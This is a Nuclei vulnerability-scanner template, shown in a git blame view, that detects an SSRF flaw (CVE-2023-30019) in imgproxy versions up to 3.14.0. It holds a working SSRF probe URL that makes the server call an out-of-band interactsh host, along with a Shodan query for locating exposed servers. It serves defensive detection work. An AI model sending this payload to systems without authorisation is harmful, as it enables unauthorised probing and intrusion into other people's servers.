nuclei-templates/http/cves/2023/CVE-2023-30019.yaml

44 lines
1.2 KiB
YAML
Raw Normal View History

2023-07-01 09:27:30 +00:00
id: CVE-2023-30019
info:
2023-07-01 10:15:22 +00:00
name: Imgproxy <= 3.14.0 - Server-side request forgery (SSRF)
2023-07-01 09:27:30 +00:00
author: DhiyaneshDK
severity: medium
description: |
imgproxy <=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.
2023-09-06 11:43:37 +00:00
remediation: |
Upgrade to a version of Imgproxy that is not affected by this vulnerability.
2023-07-01 09:27:30 +00:00
reference:
- https://breakandpray.com/cve-2023-30019-ssrf-in-imgproxy/
2023-07-01 10:15:22 +00:00
- https://github.com/imgproxy/imgproxy
2023-07-01 09:27:30 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
2023-07-01 10:15:22 +00:00
cve-id: CVE-2023-30019
2023-07-01 09:27:30 +00:00
cwe-id: CWE-918
2023-10-14 11:27:55 +00:00
epss-score: 0.00205
epss-percentile: 0.58109
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:*
2023-07-01 09:27:30 +00:00
metadata:
2023-07-01 10:15:22 +00:00
verified: true
2023-09-06 11:43:37 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: evilmartians
product: imgproxy
2023-09-06 11:43:37 +00:00
shodan-query: "Server: imgproxy"
2023-07-01 09:27:30 +00:00
tags: cve,cve2023,imgproxy,ssrf,oast
http:
- method: GET
path:
2023-07-01 10:15:22 +00:00
- "{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}"
2023-07-01 09:27:30 +00:00
matchers-condition: and
matchers:
- type: word
words:
2023-07-01 10:15:22 +00:00
- Invalid source image
2023-07-01 09:27:30 +00:00
- type: status
status:
2023-07-11 19:49:27 +00:00
- 422